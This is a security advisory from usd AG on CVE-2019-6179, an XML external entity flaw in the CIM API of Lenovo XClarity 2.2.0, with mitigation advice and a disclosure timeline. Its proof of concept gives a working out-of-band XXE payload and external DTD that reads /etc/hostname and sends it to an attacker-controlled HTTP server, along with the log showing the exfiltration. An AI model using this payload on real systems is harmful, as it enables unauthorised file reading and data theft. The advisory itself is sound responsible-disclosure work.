usd-2019-0045 | XClarity 2.2.0
Advisory ID: usd-2019-0045
CVE Number: CVE-2019-6179
Affected Product: XClarity
Affected Version: 2.2.0
Vulnerability Type: XML External Entity Processing
Security Risk: Critical
Vendor URL: https://www.lenovo.com/
Vendor Status: Fixed
Vendor Advisory : https://support.lenovo.com/de/de/solutions/len-27805
The Appliance has a CIM API listening on port 9090 that is vulnerable to XXE.
Proof of Concept (PoC)
POST /cimom HTTP/1.1 Host: 10.10.10.4:9090 Accept-Encoding: gzip, deflate Content-type: application/xml; charset="utf-8" Content-Length: 503 CIMOperation: MethodCall CIMObject: root/cimv2 Connection: close <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE CIM [ <!ELEMENT CIM ANY > <!ENTITY % sp SYSTEM "http://10.10.80.241/test.xml"> %sp; %param1; ]> <CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="1001" PROTOCOLVERSION="1.0"><SIMPLEREQ>&exfil;<IMETHODCALL NAME="EnumerateInstances"><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH><IPARAMVALUE NAME="ClassName"><CLASSNAME NAME="CIM_ComputerSystem"/></IPARAMVALUE></IMETHODCALL></SIMPLEREQ></MESSAGE></CIM>
HTTP/1.1 400 Bad Request Content-Type: application/xml;charset="utf-8" Content-length: 0 Connection: close
Meanwhile on the nc listener:
pentester:~/www$ sudo python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.32 - - [24/May/2019 15:27:00] "GET /test.xml HTTP/1.0" 200 - 10.10.10.32 - - [24/May/2019 15:27:00] "GET /?localhost HTTP/1.0" 200 - Content of test.xml: <!ENTITY % data SYSTEM "file:///etc/hostname"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.10.241/?%data;'>">
Disable external entity processing in the XML parser if possible or limit accessibility of the API to authenticated users.
- 2019-05-27 First contact request via email@example.com
- 2019-09-03 Lenovo Discloses Advisory at https://support.lenovo.com/de/de/solutions/len-27805
- 2019-10-21 First Published
This security vulnerabilities was found by Tobias Neitzel of usd AG.
ABOUT usd SECURITY ADVISORIES
In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.
Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.
Always for the sake of our mission: „more security.“
In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.
The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.